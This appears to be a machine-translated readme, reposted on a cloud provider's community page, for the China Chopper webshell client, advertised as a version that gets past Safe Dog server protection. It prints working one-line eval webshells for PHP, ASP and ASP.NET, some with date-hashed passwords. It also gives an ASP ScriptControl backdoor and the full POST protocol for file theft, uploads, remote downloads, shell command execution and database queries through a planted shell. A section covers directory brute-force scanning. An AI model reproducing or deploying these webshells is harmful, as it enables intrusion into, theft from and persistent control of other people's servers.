2015 latest special edition over Dog Chopper, past the most recent version of V4.2 security Dog!

Source: Internet
Author: User
Tags closing tag

Latest special edition over Dog Chopper, past the most recent version of V4.2 safe dog!

1. Support Server Security Dog V4.1.08893

2. Support Website Security Dog V3.3.09060

3. Increase the power of special command function


Baidu Network disk: Http://pan.baidu.com/s/1gdtiTTh

51CTO Download: http://down.51cto.com/data/2037909

(If there is failure, please the Officer Net: Www.cncaidao.net submit Recommendations)


----------------------------------------------------------------------------------------------------------
Disclaimer:
Please pay attention to the use of the environment and comply with national laws and regulations!
Due to improper use of the consequences of the factory does not assume any responsibility!
----------------------------------------------------------------------------------------------------------
Procedures in the use of the process will inevitably have a variety of bugs, to the official website to see if there is an update it, perhaps it has been repaired.
----------------------------------------------------------------------------------------------------------

Uincode mode compilation, support multi-language input display.
In the non-Simplified Chinese environment, the automatic change into the English interface, the translation of the wrong place please leave a message.

I. Script client (including but not limited to eval) section
1) Basic information
Eval server only need a simple line of code, you can use this program to achieve common management functions, function code two times after the transmission, the ability of the IDs greatly improved.
Currently supported server-side scripts: PHP, ASP, ASP, and Web sites that support HTTPS secure connections.
The code that runs on the server is as follows:
PHP: <?php @eval ($_post[' Chopper ');? >
ASP: <%eval Request ("Chopper")%>
asp: <%@ page language= "Jscript"%><%eval (request.item["Chopper"], "unsafe");%>
(Note: ASP.) NET to separate a file or this file is also a JScript script)
Customize: Custom type, function code is saved on the server, theoretically supports all dynamic scripts, as long as the correct interaction with the chopper.
This mode can be customized on demand, such as simply browsing the directory, or as long as the virtual terminal function, the code can be very brief.

Connection password with date, service-side notation:
asp:
<%@ page language= "Jscript"%><%eval (request.item[formsauthentication.hashpasswordforstoringinconfigfile (String.Format ("{0:YYYYMMDD}", DateTime.Now.ToUniversalTime ()) + "37e4dd20c310142564fc483db1132f36", "MD5"). ToUpper ()], "unsafe");%>
Php:
@eval ($_post[strtoupper (MD5 (gmdate ("YMD"). " 37e4dd20c310142564fc483db1132f36 ")]);
For example: the password for the chopper is chopper, plus three characters in front, the new password is: {d}chopper


2) Several major functions
In the main view, right-click/Add, enter the server-side address in the popup dialog, connect the password (note the pass string in the previous example), select the correct script type and language encoding,
After saving can use file management, virtual terminal, database management, self-written script a few chunks of functionality.
1. File management: [featured] Cache download directory, and Support offline view cache directory;
2. Virtual Terminal: [Features] humanized design, easy to operate; (input help to see more usage), the extra-long command is split into 5k bytes, and submitted separately.
3. Database management: [featured] Graphical interface, support for Mysql,mssql,oracle,infomix,access, and a database that supports ADO mode connection.
If you are proficient in SQL syntax, why should you phpmyadmin it? Moreover, the chopper also supports the database management of any script.
(The database connection method under various script conditions, please click the configuration button in the upper left corner of the database management interface to view)
4. Self-writing script: Through simple encoding after submitting the user's own script to the server execution, to achieve rich functionality, can also choose to send to the browser execution.
If you want to write your own CCC script, you can refer to the CCC directory of the sample code, I believe you can also write a feature-rich script.
You can download someone else's CCC script on the website, or share your pride.
Note: Some features may not work properly due to server security settings.

3) configuration information fill in the instructions
---------------------------------------------------------------------------------------
A) Database aspects:
-----------------------------------------------------------------------------
PHP Script:
<T> type </T> type can be one of the Mysql,mssql,oracle,infomix
<H> Host address <H> host address can be a machine name or IP address, such as localhost
<U> database user </U> user name to connect to the database, such as root
<P> Database Password </P> connection database password, such as 123455

<L>utf8</L> This database type is optional when MySQL script is PHP, Latin1 is not required

ASP and ASP. NET Script:
<T> type </T> type can only fill ADO
<c>ado configuration Information </C>
ADO connects various databases in different ways. If the configuration information for MSSQL is
Driver={sql Server}; server= (local);D atabase=master; Uid=sa; pwd=123456;
At the same time, support NT Authentication login MSSQL database, and can export the query result list as HTML file

Customize script:
<T> type </T> type can only be filled xdb
<X> configuration information with customize script conventions </X>
The customize.jsp database parameter filling method with the kitchen knife is as follows (two lines):
MSSQL:
<X>
Com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databasename=test;user=sa;password=123456
</X>
Mysql:
<X>
Com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
Oracle.jdbc.driver.OracleDriver
Jdbc:oracle:thin:user/[email Protected]:1521/test
</X>

B) Other aspects:
-----------------------------------------------------------------------------
Add additional data for additional submissions, such as the new server for ASP:
<%
Set o = Server.CreateObject ("ScriptControl")
O.language = "VBScript"
O.addcode (Request ("SC"))
O.run "FF", Server,response,request,application,session,error
%>
Well, the chopper is filled in at the configuration:
&LT;O&GT;SC=FUNCTION+FF (Server,response,request,application,session,error): eval (Request ("Pass")): End+function </O>
Then use the password pass to connect.

Post an additional packet before the feature is submitted: only once during the session.
<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>

Example of default terminal program path setting:
<SHELL>/bin/sh</SHELL>

Examples of virtual terminal default command settings:
<CMD>whoami</CMD>

Example of directory settings open by default for file management:
<CD>c:\windows\temp\</CD>

3) HTTP Login Verification
Shell address so fill http://user:[email protected]/server.asp
Special characters in the user name password can be converted using URL encoding.

4) Data import: In the Shell list interface, right-click on a menu, you can import other chopper library into the current classification.

Second, security scan
Spider crawling, binding domain name query, catalog blasting.
Command explanation:
A) Check the binding domain name of the single IP
{REVERSE_IP} {url:http://www.maicaidao.com/}
B) Scan this C-segment open Web server and query the bound domain name
{Reverse_ip_c} {url:http://www.maicaidao.com/}
c) scan only open Web servers in this section C
{Reverse_ip_c} {url:http://www.maicaidao.com/} {Port}
D) Spider crawling
{Spider} {url:http://www.maicaidao.com/}
E) Spiders crawl and set the crawl range
{Spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
F) Spiders crawl, filter duplicate URLs to speed up
Plus {filter}
G) burst function,%s is a row in Dict
Flag: followed by specific keywords in the returned data (with HTTP headers)
Add!! True if the keyword is not included, otherwise contains the keyword true
List.txt is the file under the current directory and can be set to an absolute path, note: Do not include too many rows.
Note: Starting with version 20100626, list.txt must be a Unicode-formatted text file
{Crack} {url:http://%s/admin/} {flag:http/1.1 200} {Dict:list.txt}
{Crack} {url:http://%s/admin/} {flag:!! http/1.1 404} {Dict:list.txt}
{Crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {Dict:list.txt}

Third, timing reminders
When the alarm clock comes in, Cycle: monthly/weekly/daily/only once.

Four, fast start
Some commonly used shortcuts are placed here, you can specify the user identity to run the program. This part of the data is encrypted and stored.

V. Browser
is a dedicated web browser: Post Browse/Custom cookies,/Execute custom script/Auto Refresh page/search with IP Web page.
If there is a Ip.dat library, the status bar will show the IP of this website, country code.

Vi. other Parts
Waiting to join.



--------------------------------------------
20110628 Update Considerations
Cache libraries It's best to rebuild.
--------------------------------------------


File Description:
------------------------------------------------------------------
Chopper.exe Chopper Program
master database of Db.mdb Chopper
------------------------------------------------------------------
CACHE.TMP Chopper Cache Database (can be deleted)
Readme.txt What you are looking at now (can be deleted)
<CCC> Chopper's self-writing script (can be deleted)
<Customize> Customize Mode service side (can be deleted)
Customize.aspx This is a sample server for C # service (full-featured)
Customize.jsp This is an example of a JSP server (full-featured)
Customize.cfm This is a CFM sample server (file management, virtual terminal)



----with---------------------------Customize mode Chopper and service-side communication interface-----------------------------------------------------------------
The service-side code----------------------------------other languages can be written on this interface (see CUSTOMIZE.JSP/CUSTOMIZE.CFM)---------------------
Example: Kitchen knife client Fill in the password is pass, the page encoding is selected GB2312 (JSP service side will use this parameter)
Note: All parameters are submitted as post, and the returned data is marked with->| as the start tag and |<-as the closing tag.
Note: The error message returned starts with error://
Note: \ t represents tab tab,\r\n for newline carriage return, \ n for carriage return
Note: The database configuration information is a string that the server-side script can customize for this string format.
--------------------------------------------------------------------------------------------------------------- --------------------

[Get the absolute path of the current directory]
Submitted by: pass=a&z0=gb2312
Return: The absolute path of the directory \ T, if it is followed by a Windows system followed by a list of drives
Example: c:\inetpub\wwwroot\ c:d:e:k:
Example:/var/www/html/

[Directory Browse]
Commit: pass=b&z0=gb2312&z1= Directory absolute path
Return: First directory after the file, directory name to add/, after the file name do not add/
Example:
Directory name/\t time \ t size \ t property \ n Directory name/\t time \ t size \ t property \ n
File name \ t time \ t size \ t property \ n filename \ t time \ t size \ t property \ n

[Read text file]
Commit: pass=c&z0=gb2312&z1= file absolute path
Return: The contents of a text file

[Write to text file]
Submitted by: pass=d&z0=gb2312&z1= file Absolute path &z2= file contents
Returned: Successfully returned 1, unsuccessful return error message

[Delete files or directories]
Commit: The absolute path to the pass=e&z0=gb2312&z1= file or directory
Returned: Successfully returned 1, unsuccessful return error message

[Download file]
Commit: Absolute path to the pass=f&z0=gb2312&z1= server file
Back: To download the contents of a file

[Upload file]
Submission: pass=g&z0=gb2312&z1= File upload absolute path &z2= file contents (hexadecimal text format)
Back: To download the contents of a file

[Paste after copying files or directories]
Commit: pass=h&z0=gb2312&z1= copy absolute path &z2= paste Absolute path
Returned: Successfully returned 1, unsuccessful return error message

[File or directory rename]
Submitted by: pass=i&z0=gb2312&z1= (absolute path) &z2= new name (absolute path)
Returned: Successfully returned 1, unsuccessful return error message

[New Catalog]
Commit: pass=j&z0=gb2312&z1= new directory Name (absolute path)
Returned: Successfully returned 1, unsuccessful return error message

[Modify file or directory time]
Commit: pass=k&z0=gb2312&z1= The absolute path of the file or directory &z2= time (format: Yyyy-mm-dd HH:mm:ss)
Returned: Successfully returned 1, unsuccessful return error message

[download file to server]
Commit: Pass=l&z0=gb2312&z1=url path &z2= The absolute path saved after download
Returned: Successfully returned 1, unsuccessful return error message

[Execute Shell command (before the shell path is based on the server system type Plus-C or/C parameter)]
Submit: Pass=m&z0=gb2312&z1= (-C or/C) plus Shell path &z2=shell command
Return: Command execution result

[Get basic information about the database]
Submit: pass=n&z0=gb2312&z1= Database configuration information
Returned: Successfully returned database (tab \ t delimited), error message not successfully returned

[Get database table name]
Submit: pass=o&z0=gb2312&z1= database configuration information \ r \ n Database name
Return: Successful return data table (\ t delimited), error message not successfully returned

[Get Data table column name]
Submit: pass=p&z0=gb2312&z1= database configuration information \ r \ n database name \ r \ n data table name
Return: Successful Return data column (tab \ t delimited), failed to return error message

[Execute Database command]
Submit: pass=q&z0=gb2312&z1= database configuration information \ r \ n Database name &z2=sql command
Return: Successful return of data table contents, error message not successfully returned
Note: The first behavior of the header is returned, followed by each row in the list, and the number of columns is required to be consistent. Each column in the row is followed by a \t|\t tag, with each line marked \ r \ n to end

2015 latest special edition over Dog Chopper, past the most recent version of V4.2 security Dog!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.